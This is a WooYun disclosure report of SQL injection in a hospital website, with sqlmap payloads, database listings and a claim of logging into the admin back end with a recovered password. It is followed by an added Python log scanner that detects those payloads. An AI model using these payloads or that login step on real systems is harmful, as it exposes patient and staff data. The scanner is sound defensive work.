WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------------------- http://drop.zone.ci/
2015-03-27: Details reported to the vendor, awaiting vendor handling
2015-03-31: Vendor confirmed; details disclosed to the vendor only
2015-04-10: Details disclosed to core white hats and relevant domain experts
2015-04-20: Details disclosed to regular white hats
2015-04-30: Details disclosed to intern white hats
2015-05-15: Details disclosed to the public
As the title says.
Injection points:
1. http://www.rjh.com.cn/rjhsearch/Pages/Detail.aspx?yggh=J9418
2. http://www.rjh.com.cn/RUIJIN_Portal_ClickCount_WebSite/ClickOrder.aspx?PortalType=rjh
3. http://www.rjh.com.cn/mzynjbapp/Expert/OfficeList.aspx?OfficeID=4160000
Taking the first one as an example:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: yggh
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: yggh=J9418' AND 5506=5506 AND 'YGzo'='YGzo

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: yggh=J9418' UNION ALL SELECT NULL,NULL,NULL,CHAR(58)+CHAR(119)+CHAR(103)+CHAR(114)+CHAR(58)+CHAR(76)+CHAR(104)+CHAR(89)+CHAR(77)+CHAR(115)+CHAR(115)+CHAR(104)+CHAR(100)+CHAR(115)+CHAR(77)+CHAR(58)+CHAR(116)+CHAR(98)+CHAR(113)+CHAR(58),NULL,NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: yggh=J9418'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: yggh=J9418' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [28]:
[*] CMS2003
[*] crf
[*] Forums
[*] HIS
[*] hytz
[*] IntraForums
[*] LWPortalDB
[*] LWportalSite
[*] LWXQSL
[*] LZX_hytz
[*] master
[*] model
[*] msdb
[*] Northwind
[*] OGManagement
[*] PharmForums
[*] PortalASPDB
[*] pubs
[*] rj_pxb
[*] RJPortalDB
[*] rjyy_jyk
[*] RuijinOA
[*] SPS01_Config_db
[*] tempdb
[*] webdbdns,1434
[*] 瑞金内网门户1_PROF
[*] 瑞金内网门户1_SERV
[*] 瑞金内网门户1_SITE
The "RJGH_User" table in the "RJPortalDB" database contains a large amount of patient information.
I won't dig into the actual data. The "crf" database yields the administrator account and password, and I logged into the back end without trouble.
PS: the second injection point yields 99 databases
available databases [99]:
[*] ChuKeAssessment
[*] db_ExamOnline
[*] EndocrineQuestionnaire
[*] EndocrineQuestionnaire_JS
[*] ExcellentManagerApply
[*] FORMDB
[*] Forum
[*] HF_HRDB
[*] HIS_JBDM_DB
[*] HR_ExcellentYouthAssessment
[*] HR_PerformanceAssessment
[*] HR_WageQuery
[*] HRDB
[*] HRDB_LOG
[*] IntertidCMS
[*] IntertidPermissions
[*] IntertidWebApp
[*] master
[*] model
[*] msdb
[*] OA_AbroadRequest
[*] OA_AdvanceRequest
[*] OA_APPDB
[*] OA_ArchiveList
[*] OA_AudioVisual
[*] OA_Budget
[*] OA_ClinicalReimbursement
[*] OA_ClinicScheduling
[*] OA_CommunistPartyMemberManage
[*] OA_ConsultRequest
[*] OA_CPDCirculation
[*] OA_DoctorSelectCourse
[*] OA_DoctorsScheduling
[*] OA_DonateApprove
[*] OA_EndocrineDataMaintain
[*] OA_EndocrineResearchManagement
[*] OA_EnrytSystem
[*] OA_EthicExam
[*] OA_GuardSafetyManagement
[*] OA_HospitalScheduling
[*] OA_HREvaluation
[*] OA_HRNEEvaluation
[*] OA_Infection
[*] OA_MiniApplication
[*] OA_NursePapers
[*] OA_NurseScheduling
[*] OA_NurseSelectCourse
[*] OA_NursingIncidentReport
[*] OA_OnlineTraining
[*] OA_OutApprove
[*] OA_OutWorkingRequest
[*] OA_PersonModule
[*] OA_Platform
[*] OA_PSApplication
[*] OA_Reimbursement
[*] OA_Resignation
[*] OA_Satisfaction
[*] OA_StudentSelectCourse
[*] OA_Survey
[*] OA_SurveyLead
[*] OA_Task
[*] OA_Task135
[*] OA_TeachingAssessment
[*] OA_Unions
[*] OA_Vote
[*] Portal_Application
[*] PS_Conference
[*] PS_Contact
[*] PS_EmsSms
[*] PS_ExchangeApp
[*] PS_Framework
[*] PS_LogService
[*] PS_Monitor
[*] PS_Portal
[*] PS_SchedulingService
[*] PS_SecurityService
[*] PS_Task
[*] PS_Workflow
[*] Questionnaire
[*] ReportServer
[*] ReportServerNew
[*] ReportServerNewTempDB
[*] ReportServerTempDB
[*] ReservationPlatform
[*] RJCRMAPPDB
[*] RJDJDNT
[*] RJOA
[*] RJWZ
[*] RJWZCY
[*] RSSDB
[*] ruijinCMS2010
[*] RuijinHRApplication
[*] RuijinResume_WUXI_FYJ
[*] RuijinResume_WUXI_YJ
[*] ServicePlatform
[*] tempdb
[*] Test
[*] TNBDCWJ
[*] VolunteerServiceCenter
There is certainly a lot of data in there... not going any deeper.
You know what I mean.
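Defender-side illustration, added here and not part of the WooYun report or the site's own code: a small Python scanner that reads IIS 6.0 W3C extended log lines and flags, per query parameter, the four payload classes sqlmap listed above (boolean-based, UNION, stacked and time-based, plus the CHAR() encoding used in the UNION payload). The log excerpt, client addresses and user-agent strings are constructed for the example; only the .aspx paths and parameter names come from the report.

```python
"""Spot SQL-injection probes against .aspx query parameters in IIS W3C logs."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# One regex per payload class, matched against the URL-decoded parameter value.
SIGNATURES = {
    "boolean-based": re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b|'(\w+)'\s*=\s*'\2'", re.I),
    "union-based":   re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "stacked":       re.compile(r";\s*(?:WAITFOR|EXEC|DECLARE|DROP|INSERT|UPDATE|DELETE)\b", re.I),
    "time-based":    re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "char-encoding": re.compile(r"\bCHAR\(\d+\)", re.I),
}

# Constructed IIS 6.0 W3C log excerpt (not real traffic): the paths and parameter
# names are those named in the report; client IPs are documentation-range
# addresses and the user agents are invented. The last line is deliberately
# truncated to show that malformed records are skipped rather than misaligned.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2015-03-27 10:00:01 10.0.0.5 GET /rjhsearch/Pages/Detail.aspx yggh=J9418 80 - 203.0.113.7 Mozilla/5.0+(Windows+NT+6.1) 200
2015-03-27 10:00:02 10.0.0.5 GET /rjhsearch/Pages/Detail.aspx yggh=J9418%27%20AND%205506%3D5506%20AND%20%27YGzo%27%3D%27YGzo 80 - 203.0.113.7 sqlmap/1.0-dev 200
2015-03-27 10:00:03 10.0.0.5 GET /rjhsearch/Pages/Detail.aspx yggh=J9418%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR(58)%2BCHAR(119)-- 80 - 203.0.113.7 sqlmap/1.0-dev 200
2015-03-27 10:00:04 10.0.0.5 GET /rjhsearch/Pages/Detail.aspx yggh=J9418%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 80 - 203.0.113.7 sqlmap/1.0-dev 200
2015-03-27 10:00:09 10.0.0.5 GET /rjhsearch/Pages/Detail.aspx yggh=J9418%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 80 - 203.0.113.7 sqlmap/1.0-dev 200
2015-03-27 10:00:15 10.0.0.5 GET /mzynjbapp/Expert/OfficeList.aspx OfficeID=4160000 80 - 198.51.100.9 Mozilla/5.0+(Windows+NT+6.1) 200
2015-03-27 10:00:16 10.0.0.5 GET /truncated.aspx
"""


def parse_w3c(text):
    """Yield one dict per data record, using the #Fields: directive for column names."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed record: skip instead of misaligning columns
        yield dict(zip(fields, parts))


def split_query(query):
    """Yield (name, value) pairs decoded the way the server-side page sees them."""
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def classify(value):
    """Return the sorted list of payload classes whose signature matches the value."""
    return sorted(tag for tag, rx in SIGNATURES.items() if rx.search(value))


def scan_log(text):
    """Return one hit per (request, parameter) whose decoded value matches a signature."""
    hits = []
    for rec in parse_w3c(text):
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        for name, value in split_query(query):
            tags = classify(value)
            if tags:
                hits.append({
                    "time": f"{rec['date']} {rec['time']}",
                    "client": rec["c-ip"],
                    "uri": rec["cs-uri-stem"],
                    "param": name,
                    "tags": tags,
                    "value": value,
                })
    return hits


def summarize(hits):
    """Count hits per (client, page) so one source probing one endpoint stands out."""
    return Counter((h["client"], h["uri"]) for h in hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h['time']} {h['client']} {h['uri']} {h['param']}={h['value']!r} -> {h['tags']}")
    for (client, uri), n in summarize(found).items():
        print(f"{client} probed {uri} {n} times")
```

IIS records cs-uri-query exactly as received, so the scanner URL-decodes each value before matching, which is the form the vulnerable Detail.aspx page would have handed to SQL Server. Grouping by client and page turns the individual boolean, UNION, stacked and WAITFOR probes into a single "one source hammering one endpoint" signal; the two five-second time-based requests would additionally show up as unusually slow responses if time-taken is logged.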
Severity: High
Vulnerability Rank: 12
Confirmation time: 2015-03-31 11:22
CNVD confirmed and reproduced the described situation; it has been handed over by CNCERT to the Shanghai branch center, which will coordinate handling with the website's administering organization.
None yet